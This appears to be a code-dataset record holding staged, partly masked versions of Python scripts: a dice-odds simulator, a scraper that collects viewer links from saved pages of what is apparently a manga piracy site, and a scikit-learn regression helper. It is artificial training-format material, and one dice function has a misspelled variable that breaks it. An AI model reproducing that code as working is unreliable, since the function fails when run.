self.rerolled:\r\n\t\t\tself.__roll__()\r\n\t\t\tself.rerolled = True\r\n\t\t\treturn True\r\n\t\treturn False\r\n\r\n# DICE LIST METHOD DEFINITIONS\r\n\r\ndef count_relevant_results(dice_list, relevant_results):\r\n\tcount = 0\r\n\tfor i in range(len(dice_list)):\r\n\t\tif dice_list[i].result & relevant_results:\r\n\t\t\tcount += 1\r\n\treturn count\r\n\r\ndef roll_attack_dice(number):\r\n\tdice_results = []\r\n\tfor i in range(number):\r\n\t\tdice_results.append(attack_die())\r\n\treturn dice_results\r\n\r\ndef roll_evade_dice(number):\r\n\tdice_results = []\r\n\tfor i in range(number):\r\n\t\tdice_results.append(evade_die())\r\n\treturn dice_results\r\n\r\n# DICE LIST MODIFICATION DEFINITITONS\r\n\r\nclass perform(Enum):\r\n\tFOR_ALL = 7\r\n\tONCE = 1\r\n\r\nclass change:\r\n\tdef __init__(self, rule, from_result, to_result):\r\n\t\tself.rule = rule\r\n\t\tself.from_result = from_result\r\n\t\tself.to_result = to_result\r\n\tdef modify_dice_list(self, dice_list):\r\n\t\tfor i in range(len(dice_list)):\r\n\t\t\tif dice_list[i].equals(self.from_result):\r\n\t\t\t\tdice_list[i].change(self.to_result)\r\n\t\t\t\tif self.rule == perform.ONCE:\r\n\t\t\t\t\treturn dice_list\r\n\t\treturn dice_list\r\n\r\nclass reroll:\r\n\tdef __init__(self, rule, from_result):\r\n\t\tself.rule = rule\r\n\t\tself.from_result = from_result\r\n\tdef modify_dice_list(self, dice_list):\r\n\t\tfor i in range(len(dice_list)):\r\n\t\t\tif dice_list[i].equals(self.from_result):\r\n\t\t\t\tif dice_list[i].reroll() and self.rule == perform.ONCE:\r\n\t\t\t\t\treturn dice_list\r\n\t\treturn dice_list\r\n\t\r\n# Debug\r\ndef __print_dice_list(dice_list):\r\n\tfor i in range(len(dice_list)):\r\n\t\tprint(dice_list[i], end=\" \")\r\n\tprint(\"\")\r\n\t\r\ndef get_dice_chances(number_of_dice, dice_roll_function, relevant_results, enemy_modifications, friendly_modifications):\r\n\trelevant_counts = numpy.zeros((8)) \r\n\tnum_iterations = 200000\r\n\tfor i in range(num_iterations):\r\n\t\tdice_list = 
dice_roll_function(number_of_dice)\r\n\t\t# Perform modifications\r\n\t\tfor j in range(len(enemy_modifications)):\r\n\t\t\tdice_list = enemy_modifications[j].modify_dice_list(dice_list)\r\n\t\tfor j in range(len(friendly_modifications)):\r\n\t\t\tdice_list = friendly_modifications[j].modify_dice_list(dice_list)\r\n\t\trelevant_count_for_this_roll = count_relevant_results(dice_list, relevant_results)\r\n\t\trelevant_counts[relevant_count_for_this_roll] += 1\t\r\n\tchances = numpy.zeros((8))\r\n\tfor i in range(len(chances)):\r\n\t\tchances[i] = float(relevant_counts[i]) / float(num_iterations)\r\n\treturn chances\r\n\r\ndef get_hit_chances(number_of_dice, enemy_modifications=[], friendly_modifications=[]):\r\n\treturn get_dice_chances(number_of_dice, roll_attack_dice, result.HIT | result.CRIT, enemy_modifications, friendly_modifications)\r\n\r\ndef get_evade_chances(number_of_dice, enemy_modifications=[], friendly_modifications=[]):\r\n\treturn get_dice_chances(number_of_dice, roll_evade_dice, result.EVADE, enemy_modifications, friendly_modifications)\r\n\r\ndef get_crit_chances(number_of_dice, enemy_modifications=[], friendly_modifications=[]):\r\n\treturn get_dice_chances(number_of_dice, roll_attack_dice, result.CRIT, eenemy_modifications, friendly_modifications)\r\n\r\ndef hits_vs_evade(hit_chances, evade_chances):\r\n\tchances = [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0]\r\n\tfor i in range(1, len(hit_chances)):\r\n\t\tfor j in range(i):\r\n\t\t\tchances[i - j] = chances[i - j] + (hit_chances[i] * evade_chances[j])\r\n\ttotal = 0.0\r\n\tfor i in range(1, len(chances)):\r\n\t\ttotal = total + chances[i]\r\n\tchances[0] = 1.0 - total\r\n\treturn chances\r\n\t\r\ndef average_chance(chance_list):\r\n\tavg = 0.0\r\n\tfor i in range(1, len(chance_list)):\r\n\t\tavg = avg + (i * chance_list[i])\r\n\treturn avg",
"step-ids": [
24,
26,
29,
33,
38
]
}
|
[
24,
26,
29,
33,
38
] |
<|reserved_special_token_0|>
def _map(arg):
key, names = arg
size = len(names)
urls = set()
for index, name in enumerate(names):
html = gzip.decompress(open('htmls/' + name, 'rb').read()).decode()
soup = bs4.BeautifulSoup(html, 'lxml')
for a in soup.findAll('a', href=True):
url = a.get('href')
if len(url) >= 2 and url[0] == '/':
url = URL + url
if URL not in url:
continue
if re.search('kai_pc_viewer\\?p=', url) is None:
continue
print(f'{key} {index}/{size} {url}')
urls.add(url)
return urls
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def _map(arg):
key, names = arg
size = len(names)
urls = set()
for index, name in enumerate(names):
html = gzip.decompress(open('htmls/' + name, 'rb').read()).decode()
soup = bs4.BeautifulSoup(html, 'lxml')
for a in soup.findAll('a', href=True):
url = a.get('href')
if len(url) >= 2 and url[0] == '/':
url = URL + url
if URL not in url:
continue
if re.search('kai_pc_viewer\\?p=', url) is None:
continue
print(f'{key} {index}/{size} {url}')
urls.add(url)
return urls
<|reserved_special_token_0|>
for index, name in enumerate([name.split('/').pop() for name in glob.glob(
'htmls/*')]):
key = index % 12
if args.get(key) is None:
args[key] = []
args[key].append(name)
<|reserved_special_token_0|>
with concurrent.futures.ProcessPoolExecutor(max_workers=12) as exe:
for _urls in exe.map(_map, args):
[urls.add(url) for url in _urls]
open('pc_viewer_urls.pkl.gz', 'wb').write(gzip.compress(pickle.dumps(urls)))
<|reserved_special_token_1|>
<|reserved_special_token_0|>
URL = 'http://mangamura.org'
def _map(arg):
key, names = arg
size = len(names)
urls = set()
for index, name in enumerate(names):
html = gzip.decompress(open('htmls/' + name, 'rb').read()).decode()
soup = bs4.BeautifulSoup(html, 'lxml')
for a in soup.findAll('a', href=True):
url = a.get('href')
if len(url) >= 2 and url[0] == '/':
url = URL + url
if URL not in url:
continue
if re.search('kai_pc_viewer\\?p=', url) is None:
continue
print(f'{key} {index}/{size} {url}')
urls.add(url)
return urls
args = {}
for index, name in enumerate([name.split('/').pop() for name in glob.glob(
'htmls/*')]):
key = index % 12
if args.get(key) is None:
args[key] = []
args[key].append(name)
args = [(key, names) for key, names in args.items()]
urls = set()
with concurrent.futures.ProcessPoolExecutor(max_workers=12) as exe:
for _urls in exe.map(_map, args):
[urls.add(url) for url in _urls]
open('pc_viewer_urls.pkl.gz', 'wb').write(gzip.compress(pickle.dumps(urls)))
<|reserved_special_token_1|>
import glob
import json
import pickle
import gzip
import os
import hashlib
import re
import bs4, lxml
import concurrent.futures
URL = 'http://mangamura.org'
def _map(arg):
key, names = arg
size = len(names)
urls = set()
for index, name in enumerate(names):
html = gzip.decompress(open('htmls/' + name, 'rb').read()).decode()
soup = bs4.BeautifulSoup(html, 'lxml')
for a in soup.findAll('a', href=True):
url = a.get('href')
if len(url) >= 2 and url[0] == '/':
url = URL + url
if URL not in url:
continue
if re.search('kai_pc_viewer\\?p=', url) is None:
continue
print(f'{key} {index}/{size} {url}')
urls.add(url)
return urls
args = {}
for index, name in enumerate([name.split('/').pop() for name in glob.glob(
'htmls/*')]):
key = index % 12
if args.get(key) is None:
args[key] = []
args[key].append(name)
args = [(key, names) for key, names in args.items()]
urls = set()
with concurrent.futures.ProcessPoolExecutor(max_workers=12) as exe:
for _urls in exe.map(_map, args):
[urls.add(url) for url in _urls]
open('pc_viewer_urls.pkl.gz', 'wb').write(gzip.compress(pickle.dumps(urls)))
<|reserved_special_token_1|>
import glob
import json
import pickle
import gzip
import os
import hashlib
import re
import bs4, lxml
import concurrent.futures
URL = 'http://mangamura.org'
def _map(arg):
    """Extract viewer URLs from one worker's share of the saved HTML pages.

    Parameters:
        arg -- (key, names) tuple: a worker identifier used only for progress
               printing, and the list of gzipped HTML filenames (under htmls/)
               this worker should scan.

    Returns:
        set of absolute URLs on the site whose href matches 'kai_pc_viewer?p='.
    """
    key, names = arg
    size = len(names)
    urls = set()
    # Compile the pattern once instead of re-matching the pattern string for
    # every anchor of every page.
    viewer_pattern = re.compile(r'kai_pc_viewer\?p=')
    for index, name in enumerate(names):
        # Close the file handle deterministically; the original left it to be
        # collected by the garbage collector.
        with open('htmls/' + name, 'rb') as fh:
            html = gzip.decompress(fh.read()).decode()
        soup = bs4.BeautifulSoup(html, 'lxml')
        for a in soup.findAll('a', href=True):
            url = a.get('href')
            if len(url) >= 2 and url[0] == '/':
                url = URL + url
            if URL not in url:
                continue
            if viewer_pattern.search(url) is None:
                continue
            print(f'{key} {index}/{size} {url}')
            urls.add(url)
    return urls
# Driver: shard the downloaded page filenames round-robin into 12 groups so
# each worker process receives a roughly equal share.
args = {}
for index, name in enumerate([name.split('/').pop() for name in glob.glob(
        'htmls/*')]):
    key = index % 12
    args.setdefault(key, []).append(name)
args = [(key, names) for key, names in args.items()]

# Fan the shards out across worker processes and union their URL sets.
urls = set()
with concurrent.futures.ProcessPoolExecutor(max_workers=12) as exe:
    for _urls in exe.map(_map, args):
        # set.update replaces the original side-effecting list comprehension.
        urls.update(_urls)

# Persist the collected viewer URLs as a gzip-compressed pickle, closing the
# output handle deterministically.
with open('pc_viewer_urls.pkl.gz', 'wb') as out:
    out.write(gzip.compress(pickle.dumps(urls)))
|
flexible
|
{
"blob_id": "3acd592594ae4f12b9b694aed1aa0d48ebf485f5",
"index": 5787,
"step-1": "<mask token>\n\n\ndef _map(arg):\n key, names = arg\n size = len(names)\n urls = set()\n for index, name in enumerate(names):\n html = gzip.decompress(open('htmls/' + name, 'rb').read()).decode()\n soup = bs4.BeautifulSoup(html, 'lxml')\n for a in soup.findAll('a', href=True):\n url = a.get('href')\n if len(url) >= 2 and url[0] == '/':\n url = URL + url\n if URL not in url:\n continue\n if re.search('kai_pc_viewer\\\\?p=', url) is None:\n continue\n print(f'{key} {index}/{size} {url}')\n urls.add(url)\n return urls\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef _map(arg):\n key, names = arg\n size = len(names)\n urls = set()\n for index, name in enumerate(names):\n html = gzip.decompress(open('htmls/' + name, 'rb').read()).decode()\n soup = bs4.BeautifulSoup(html, 'lxml')\n for a in soup.findAll('a', href=True):\n url = a.get('href')\n if len(url) >= 2 and url[0] == '/':\n url = URL + url\n if URL not in url:\n continue\n if re.search('kai_pc_viewer\\\\?p=', url) is None:\n continue\n print(f'{key} {index}/{size} {url}')\n urls.add(url)\n return urls\n\n\n<mask token>\nfor index, name in enumerate([name.split('/').pop() for name in glob.glob(\n 'htmls/*')]):\n key = index % 12\n if args.get(key) is None:\n args[key] = []\n args[key].append(name)\n<mask token>\nwith concurrent.futures.ProcessPoolExecutor(max_workers=12) as exe:\n for _urls in exe.map(_map, args):\n [urls.add(url) for url in _urls]\nopen('pc_viewer_urls.pkl.gz', 'wb').write(gzip.compress(pickle.dumps(urls)))\n",
"step-3": "<mask token>\nURL = 'http://mangamura.org'\n\n\ndef _map(arg):\n key, names = arg\n size = len(names)\n urls = set()\n for index, name in enumerate(names):\n html = gzip.decompress(open('htmls/' + name, 'rb').read()).decode()\n soup = bs4.BeautifulSoup(html, 'lxml')\n for a in soup.findAll('a', href=True):\n url = a.get('href')\n if len(url) >= 2 and url[0] == '/':\n url = URL + url\n if URL not in url:\n continue\n if re.search('kai_pc_viewer\\\\?p=', url) is None:\n continue\n print(f'{key} {index}/{size} {url}')\n urls.add(url)\n return urls\n\n\nargs = {}\nfor index, name in enumerate([name.split('/').pop() for name in glob.glob(\n 'htmls/*')]):\n key = index % 12\n if args.get(key) is None:\n args[key] = []\n args[key].append(name)\nargs = [(key, names) for key, names in args.items()]\nurls = set()\nwith concurrent.futures.ProcessPoolExecutor(max_workers=12) as exe:\n for _urls in exe.map(_map, args):\n [urls.add(url) for url in _urls]\nopen('pc_viewer_urls.pkl.gz', 'wb').write(gzip.compress(pickle.dumps(urls)))\n",
"step-4": "import glob\nimport json\nimport pickle\nimport gzip\nimport os\nimport hashlib\nimport re\nimport bs4, lxml\nimport concurrent.futures\nURL = 'http://mangamura.org'\n\n\ndef _map(arg):\n key, names = arg\n size = len(names)\n urls = set()\n for index, name in enumerate(names):\n html = gzip.decompress(open('htmls/' + name, 'rb').read()).decode()\n soup = bs4.BeautifulSoup(html, 'lxml')\n for a in soup.findAll('a', href=True):\n url = a.get('href')\n if len(url) >= 2 and url[0] == '/':\n url = URL + url\n if URL not in url:\n continue\n if re.search('kai_pc_viewer\\\\?p=', url) is None:\n continue\n print(f'{key} {index}/{size} {url}')\n urls.add(url)\n return urls\n\n\nargs = {}\nfor index, name in enumerate([name.split('/').pop() for name in glob.glob(\n 'htmls/*')]):\n key = index % 12\n if args.get(key) is None:\n args[key] = []\n args[key].append(name)\nargs = [(key, names) for key, names in args.items()]\nurls = set()\nwith concurrent.futures.ProcessPoolExecutor(max_workers=12) as exe:\n for _urls in exe.map(_map, args):\n [urls.add(url) for url in _urls]\nopen('pc_viewer_urls.pkl.gz', 'wb').write(gzip.compress(pickle.dumps(urls)))\n",
"step-5": "import glob\n\nimport json\n\nimport pickle\n\nimport gzip\n\nimport os\n\nimport hashlib\n\nimport re\n\nimport bs4, lxml\n\nimport concurrent.futures\nURL = 'http://mangamura.org'\ndef _map(arg):\n key, names = arg\n size = len(names)\n urls = set()\n for index, name in enumerate(names):\n html = gzip.decompress(open('htmls/' + name, 'rb').read()).decode()\n soup = bs4.BeautifulSoup(html, 'lxml')\n for a in soup.findAll('a', href=True):\n url = a.get('href')\n if len(url) >= 2 and url[0] == '/':\n url = URL + url\n if URL not in url:\n continue\n if re.search(r'kai_pc_viewer\\?p=', url) is None:\n continue\n print(f'{key} {index}/{size} {url}')\n urls.add(url)\n return urls\n\nargs = {}\nfor index, name in enumerate([name.split('/').pop() for name in glob.glob('htmls/*')]):\n key = index%12\n if args.get(key) is None:\n args[key] = []\n args[key].append( name )\nargs = [(key,names) for key, names in args.items()]\nurls = set()\nwith concurrent.futures.ProcessPoolExecutor(max_workers=12) as exe:\n for _urls in exe.map(_map,args) :\n [urls.add(url) for url in _urls]\nopen('pc_viewer_urls.pkl.gz', 'wb').write(gzip.compress(pickle.dumps(urls)))\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
# -*- coding: utf-8 -*-
"""
Created on Sun Oct 4 12:14:16 2020
@author: mdevasish
"""
import pandas as pd
import numpy as np
from sklearn.linear_model import LinearRegression,Lasso,Ridge
from sklearn.metrics import mean_squared_error,mean_absolute_error
from sklearn.model_selection import train_test_split
import joblib
import seaborn as sns
import matplotlib.pyplot as plt
class model_construction:
    """Fit a linear model (OLS, Lasso or Ridge) on a DataFrame, persist it and
    plot diagnostics.

    The last column of ``data`` is treated as the target; all other columns
    are used as features.
    """

    def __init__(self, data, model, fit_intercept=True, alpha=1.0, max_iter=1000, solver='auto'):
        """
        Constructor to set the values before creating the model

        Input Parameters :
            data          : Input DataFrame (features first, target as last column)
            model         : One of 'LinearRegression', 'Lasso' or 'Ridge'
            fit_intercept : Whether the model estimates an intercept term
            alpha         : Regularization constant, applicable for Ridge and Lasso
            max_iter      : Maximum iterations, applicable for Lasso
            solver        : Type of solver to use, applicable for Ridge

        Raises :
            ValueError : if ``model`` is not one of the supported names
        """
        self.data = data
        self.alpha = alpha
        self.max_iter = max_iter
        self.solver = solver
        self.fit_intercept = fit_intercept

        if model == 'LinearRegression':
            self.model = LinearRegression(fit_intercept=self.fit_intercept)
        elif model == 'Lasso':
            self.model = Lasso(alpha=self.alpha, max_iter=self.max_iter,
                               fit_intercept=self.fit_intercept)
        elif model == 'Ridge':
            self.model = Ridge(alpha=self.alpha, solver=self.solver,
                               fit_intercept=self.fit_intercept)
        else:
            # ValueError is a subclass of Exception, so callers that caught
            # the previous bare Exception still work.
            raise ValueError('Wrong input model')

    def implement_model(self, filename, tsize=0.3, random_val=2020):
        """
        Fit the configured model on a train split, report metrics on the
        validation split, and persist the fitted model under ./Models/.

        The ``tsize`` and ``random_val`` parameters were documented but
        missing from the signature; they are now real keyword arguments with
        the previously hard-coded values as defaults.

        Input :
            filename   : name (without extension) used to save the model
            tsize      : size of the dataset for the validation, default 0.3
            random_val : seed for randomness for reproducibility, default 2020

        Returns :
            fimp : feature-importance DataFrame sorted by coefficient magnitude
            diag : DataFrame with actual and predicted values of the validation set
        """
        df = self.data
        model = self.model
        X, y = df.iloc[:, :-1], df.iloc[:, -1]
        X_train, X_val, y_train, y_val = train_test_split(
            X, y, test_size=tsize, random_state=random_val)
        model.fit(X_train, y_train)

        print('R square score on train set and test set are :',
              model.score(X_train, y_train), model.score(X_val, y_val))
        print('Root mean squared error on test set is :',
              np.sqrt(mean_squared_error(y_val, model.predict(X_val))))
        print('Mean absolute error on test set is :',
              mean_absolute_error(y_val, model.predict(X_val)))

        # The signed sort gives a deterministic secondary order for features
        # whose absolute coefficients tie in the final sort below.
        fimp = pd.DataFrame(zip(X.columns, model.coef_),
                            columns=['feat', 'coeff']).sort_values(by='coeff', ascending=False)
        fimp['abs_coeff'] = fimp['coeff'].apply(lambda x: x if x > 0 else -x)
        fimp['rel'] = fimp['coeff'].apply(lambda x: 'pos' if x > 0 else 'neg')
        fimp['rel'] = fimp['rel'].astype('category')
        fimp = fimp.sort_values(by='abs_coeff', ascending=False)

        pred = model.predict(X_val)
        diag = pd.DataFrame(zip(y_val, pred), columns=['Ground Truth', 'Predicted'])

        full_name = './Models/' + filename + '.sav'
        joblib.dump(model, full_name)
        return fimp, diag

    def plot_feat_imp(self, fimp, title):
        """
        Display a bar plot of absolute coefficient magnitudes per feature,
        colored by the sign of the coefficient.

        Input :
            fimp  : DataFrame with feature importance (from implement_model)
            title : Title suffix of the plot
        """
        plt.figure(figsize=(18, 12))
        sns.barplot(y='feat', x='abs_coeff', hue='rel', data=fimp)
        plt.title('Feature Importance plot for ' + title)

    def plot_diagnostic(self, diag):
        """
        Display a scatter plot of ground truth vs predicted values on the
        validation set.

        Input :
            diag : DataFrame with actual and predicted values (from implement_model)
        """
        plt.figure(figsize=(18, 9))
        # The axes object returned by scatterplot was previously bound to an
        # unused variable; it is not needed here.
        sns.scatterplot(x='Ground Truth', y='Predicted', data=diag)
        plt.title('Ground Truth vs Predicted on validation Data')
        plt.show()
|
normal
|
{
"blob_id": "f07b95a3b18aecf6cadaa8398c9158a7cd10aeeb",
"index": 7101,
"step-1": "<mask token>\n\n\nclass model_construction:\n <mask token>\n\n def implement_model(self, filename):\n \"\"\"\n Method inside the model_construction class, used for implementing the model\n and return feature importance and dataframe with actual values and predicted values of validation set\n \n Input :\n tsize : size of the dataset for the validation default value 0.3\n random_val : Seed for randomness for reproducibility default value 2020\n \n Returns :\n fimp : Feature importance of a model\n diag : diagnostic dataframe with actual values and predicted values of validation set\n \"\"\"\n df = self.data\n model = self.model\n X, y = df.iloc[:, :-1], df.iloc[:, -1]\n X_train, X_val, y_train, y_val = train_test_split(X, y, test_size=\n 0.3, random_state=2020)\n model.fit(X_train, y_train)\n print('R square score on train set and test set are :', model.score\n (X_train, y_train), model.score(X_val, y_val))\n print('Root mean squared error on test set is :', np.sqrt(\n mean_squared_error(y_val, model.predict(X_val))))\n print('Mean absolute error on test set is :', mean_absolute_error(\n y_val, model.predict(X_val)))\n fimp = pd.DataFrame(zip(X.columns, model.coef_), columns=['feat',\n 'coeff']).sort_values(by='coeff', ascending=False)\n fimp['abs_coeff'] = fimp['coeff'].apply(lambda x: x if x > 0 else -x)\n fimp['rel'] = fimp['coeff'].apply(lambda x: 'pos' if x > 0 else 'neg')\n fimp['rel'] = fimp['rel'].astype('category')\n fimp = fimp.sort_values(by='abs_coeff', ascending=False)\n pred = model.predict(X_val)\n diag = pd.DataFrame(zip(y_val, pred), columns=['Ground Truth',\n 'Predicted'])\n full_name = './Models/' + filename + '.sav'\n joblib.dump(model, full_name)\n return fimp, diag\n <mask token>\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass model_construction:\n\n def __init__(self, data, model, fit_intercept=True, alpha=1.0, max_iter\n =1000, solver='auto'):\n \"\"\"\n Constructor to set the values before creating the model\n \n Input Parameters :\n \n data : Input DataFrame\n model : Model to be implemented\n alpha : Regularization constant applicable for Ridge and Lasso\n max_iter : Maximimum iterations applicable for Lasso\n solver : Type of solver to use applicable for Ridge\n \n \"\"\"\n self.data = data\n self.alpha = alpha\n self.max_iter = max_iter\n self.solver = solver\n self.fit_intercept = fit_intercept\n if model == 'LinearRegression':\n self.model = LinearRegression(fit_intercept=self.fit_intercept)\n elif model == 'Lasso':\n self.model = Lasso(alpha=self.alpha, max_iter=self.max_iter,\n fit_intercept=self.fit_intercept)\n elif model == 'Ridge':\n self.model = Ridge(alpha=self.alpha, solver=self.solver,\n fit_intercept=self.fit_intercept)\n else:\n raise Exception('Wrong input model')\n\n def implement_model(self, filename):\n \"\"\"\n Method inside the model_construction class, used for implementing the model\n and return feature importance and dataframe with actual values and predicted values of validation set\n \n Input :\n tsize : size of the dataset for the validation default value 0.3\n random_val : Seed for randomness for reproducibility default value 2020\n \n Returns :\n fimp : Feature importance of a model\n diag : diagnostic dataframe with actual values and predicted values of validation set\n \"\"\"\n df = self.data\n model = self.model\n X, y = df.iloc[:, :-1], df.iloc[:, -1]\n X_train, X_val, y_train, y_val = train_test_split(X, y, test_size=\n 0.3, random_state=2020)\n model.fit(X_train, y_train)\n print('R square score on train set and test set are :', model.score\n (X_train, y_train), model.score(X_val, y_val))\n print('Root mean squared error on test set is :', np.sqrt(\n mean_squared_error(y_val, model.predict(X_val))))\n print('Mean 
absolute error on test set is :', mean_absolute_error(\n y_val, model.predict(X_val)))\n fimp = pd.DataFrame(zip(X.columns, model.coef_), columns=['feat',\n 'coeff']).sort_values(by='coeff', ascending=False)\n fimp['abs_coeff'] = fimp['coeff'].apply(lambda x: x if x > 0 else -x)\n fimp['rel'] = fimp['coeff'].apply(lambda x: 'pos' if x > 0 else 'neg')\n fimp['rel'] = fimp['rel'].astype('category')\n fimp = fimp.sort_values(by='abs_coeff', ascending=False)\n pred = model.predict(X_val)\n diag = pd.DataFrame(zip(y_val, pred), columns=['Ground Truth',\n 'Predicted'])\n full_name = './Models/' + filename + '.sav'\n joblib.dump(model, full_name)\n return fimp, diag\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass model_construction:\n\n def __init__(self, data, model, fit_intercept=True, alpha=1.0, max_iter\n =1000, solver='auto'):\n \"\"\"\n Constructor to set the values before creating the model\n \n Input Parameters :\n \n data : Input DataFrame\n model : Model to be implemented\n alpha : Regularization constant applicable for Ridge and Lasso\n max_iter : Maximimum iterations applicable for Lasso\n solver : Type of solver to use applicable for Ridge\n \n \"\"\"\n self.data = data\n self.alpha = alpha\n self.max_iter = max_iter\n self.solver = solver\n self.fit_intercept = fit_intercept\n if model == 'LinearRegression':\n self.model = LinearRegression(fit_intercept=self.fit_intercept)\n elif model == 'Lasso':\n self.model = Lasso(alpha=self.alpha, max_iter=self.max_iter,\n fit_intercept=self.fit_intercept)\n elif model == 'Ridge':\n self.model = Ridge(alpha=self.alpha, solver=self.solver,\n fit_intercept=self.fit_intercept)\n else:\n raise Exception('Wrong input model')\n\n def implement_model(self, filename):\n \"\"\"\n Method inside the model_construction class, used for implementing the model\n and return feature importance and dataframe with actual values and predicted values of validation set\n \n Input :\n tsize : size of the dataset for the validation default value 0.3\n random_val : Seed for randomness for reproducibility default value 2020\n \n Returns :\n fimp : Feature importance of a model\n diag : diagnostic dataframe with actual values and predicted values of validation set\n \"\"\"\n df = self.data\n model = self.model\n X, y = df.iloc[:, :-1], df.iloc[:, -1]\n X_train, X_val, y_train, y_val = train_test_split(X, y, test_size=\n 0.3, random_state=2020)\n model.fit(X_train, y_train)\n print('R square score on train set and test set are :', model.score\n (X_train, y_train), model.score(X_val, y_val))\n print('Root mean squared error on test set is :', np.sqrt(\n mean_squared_error(y_val, model.predict(X_val))))\n print('Mean 
absolute error on test set is :', mean_absolute_error(\n y_val, model.predict(X_val)))\n fimp = pd.DataFrame(zip(X.columns, model.coef_), columns=['feat',\n 'coeff']).sort_values(by='coeff', ascending=False)\n fimp['abs_coeff'] = fimp['coeff'].apply(lambda x: x if x > 0 else -x)\n fimp['rel'] = fimp['coeff'].apply(lambda x: 'pos' if x > 0 else 'neg')\n fimp['rel'] = fimp['rel'].astype('category')\n fimp = fimp.sort_values(by='abs_coeff', ascending=False)\n pred = model.predict(X_val)\n diag = pd.DataFrame(zip(y_val, pred), columns=['Ground Truth',\n 'Predicted'])\n full_name = './Models/' + filename + '.sav'\n joblib.dump(model, full_name)\n return fimp, diag\n\n def plot_feat_imp(self, fimp, title):\n \"\"\"\n Method inside the model_construction class, used for creating a feature importance plot\n \n Input :\n fimp : Dataframe with feature importance\n title : Title of the plot\n \n Displays a plot\n \"\"\"\n plt.figure(figsize=(18, 12))\n sns.barplot(y='feat', x='abs_coeff', hue='rel', data=fimp)\n plt.title('Feature Importance plot for ' + title)\n <mask token>\n",
"step-4": "<mask token>\n\n\nclass model_construction:\n\n def __init__(self, data, model, fit_intercept=True, alpha=1.0, max_iter\n =1000, solver='auto'):\n \"\"\"\n Constructor to set the values before creating the model\n \n Input Parameters :\n \n data : Input DataFrame\n model : Model to be implemented\n alpha : Regularization constant applicable for Ridge and Lasso\n max_iter : Maximimum iterations applicable for Lasso\n solver : Type of solver to use applicable for Ridge\n \n \"\"\"\n self.data = data\n self.alpha = alpha\n self.max_iter = max_iter\n self.solver = solver\n self.fit_intercept = fit_intercept\n if model == 'LinearRegression':\n self.model = LinearRegression(fit_intercept=self.fit_intercept)\n elif model == 'Lasso':\n self.model = Lasso(alpha=self.alpha, max_iter=self.max_iter,\n fit_intercept=self.fit_intercept)\n elif model == 'Ridge':\n self.model = Ridge(alpha=self.alpha, solver=self.solver,\n fit_intercept=self.fit_intercept)\n else:\n raise Exception('Wrong input model')\n\n def implement_model(self, filename):\n \"\"\"\n Method inside the model_construction class, used for implementing the model\n and return feature importance and dataframe with actual values and predicted values of validation set\n \n Input :\n tsize : size of the dataset for the validation default value 0.3\n random_val : Seed for randomness for reproducibility default value 2020\n \n Returns :\n fimp : Feature importance of a model\n diag : diagnostic dataframe with actual values and predicted values of validation set\n \"\"\"\n df = self.data\n model = self.model\n X, y = df.iloc[:, :-1], df.iloc[:, -1]\n X_train, X_val, y_train, y_val = train_test_split(X, y, test_size=\n 0.3, random_state=2020)\n model.fit(X_train, y_train)\n print('R square score on train set and test set are :', model.score\n (X_train, y_train), model.score(X_val, y_val))\n print('Root mean squared error on test set is :', np.sqrt(\n mean_squared_error(y_val, model.predict(X_val))))\n print('Mean 
absolute error on test set is :', mean_absolute_error(\n y_val, model.predict(X_val)))\n fimp = pd.DataFrame(zip(X.columns, model.coef_), columns=['feat',\n 'coeff']).sort_values(by='coeff', ascending=False)\n fimp['abs_coeff'] = fimp['coeff'].apply(lambda x: x if x > 0 else -x)\n fimp['rel'] = fimp['coeff'].apply(lambda x: 'pos' if x > 0 else 'neg')\n fimp['rel'] = fimp['rel'].astype('category')\n fimp = fimp.sort_values(by='abs_coeff', ascending=False)\n pred = model.predict(X_val)\n diag = pd.DataFrame(zip(y_val, pred), columns=['Ground Truth',\n 'Predicted'])\n full_name = './Models/' + filename + '.sav'\n joblib.dump(model, full_name)\n return fimp, diag\n\n def plot_feat_imp(self, fimp, title):\n \"\"\"\n Method inside the model_construction class, used for creating a feature importance plot\n \n Input :\n fimp : Dataframe with feature importance\n title : Title of the plot\n \n Displays a plot\n \"\"\"\n plt.figure(figsize=(18, 12))\n sns.barplot(y='feat', x='abs_coeff', hue='rel', data=fimp)\n plt.title('Feature Importance plot for ' + title)\n\n def plot_diagnostic(self, diag):\n \"\"\"\n Method inside the model_construction class, used for creating a diagnostic plot ground truth vs predicted\n \n Input :\n diag : Dataframe with feature importance\n \n Displays a plot\n \"\"\"\n plt.figure(figsize=(18, 9))\n g = sns.scatterplot(x='Ground Truth', y='Predicted', data=diag)\n plt.title('Ground Truth vs Predicted on validation Data')\n plt.show()\n",
"step-5": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Oct 4 12:14:16 2020\n\n@author: mdevasish\n\"\"\"\n\nimport pandas as pd\nimport numpy as np\nfrom sklearn.linear_model import LinearRegression,Lasso,Ridge\nfrom sklearn.metrics import mean_squared_error,mean_absolute_error\nfrom sklearn.model_selection import train_test_split\nimport joblib\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\n\nclass model_construction:\n \n def __init__(self,data,model,fit_intercept = True,alpha = 1.0, max_iter = 1000, solver = 'auto'):\n '''\n Constructor to set the values before creating the model\n \n Input Parameters :\n \n data : Input DataFrame\n model : Model to be implemented\n alpha : Regularization constant applicable for Ridge and Lasso\n max_iter : Maximimum iterations applicable for Lasso\n solver : Type of solver to use applicable for Ridge\n \n '''\n self.data = data\n self.alpha = alpha\n self.max_iter = max_iter\n self.solver = solver\n self.fit_intercept = fit_intercept\n if model == 'LinearRegression':\n self.model = LinearRegression(fit_intercept = self.fit_intercept)\n elif model == 'Lasso':\n self.model = Lasso(alpha = self.alpha,max_iter = self.max_iter,fit_intercept = self.fit_intercept)\n elif model == 'Ridge':\n self.model = Ridge(alpha = self.alpha,solver = self.solver,fit_intercept = self.fit_intercept)\n else:\n raise Exception('Wrong input model')\n \n def implement_model(self,filename):\n '''\n Method inside the model_construction class, used for implementing the model\n and return feature importance and dataframe with actual values and predicted values of validation set\n \n Input :\n tsize : size of the dataset for the validation default value 0.3\n random_val : Seed for randomness for reproducibility default value 2020\n \n Returns :\n fimp : Feature importance of a model\n diag : diagnostic dataframe with actual values and predicted values of validation set\n '''\n df = self.data\n model = 